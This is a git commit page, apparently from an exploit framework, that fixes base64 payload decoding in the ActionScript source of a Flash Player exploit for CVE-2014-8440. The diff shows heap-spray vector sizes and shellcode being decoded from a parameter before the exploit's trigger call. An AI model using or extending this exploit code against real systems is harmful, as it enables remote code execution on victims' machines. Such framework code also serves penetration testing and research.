Fix CVE-2014-8440

bug/bundler_fix
jvazquez-r7 2015-05-26 16:05:08 -05:00
parent da362914e2
commit 5c8c5aef37
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
2 changed files with 5 additions and 2 deletions

Binary file not shown.

View File

@ -42,8 +42,11 @@ package
this.object_vector_length = 5770 * 2 this.object_vector_length = 5770 * 2
this.byte_array_vector_length = 510 * 2 this.byte_array_vector_length = 510 * 2
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
payload = b64.toByteArray().toString(); var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray().toString()
this.initialize_worker_and_ba() this.initialize_worker_and_ba()
if (!this.trigger()) if (!this.trigger())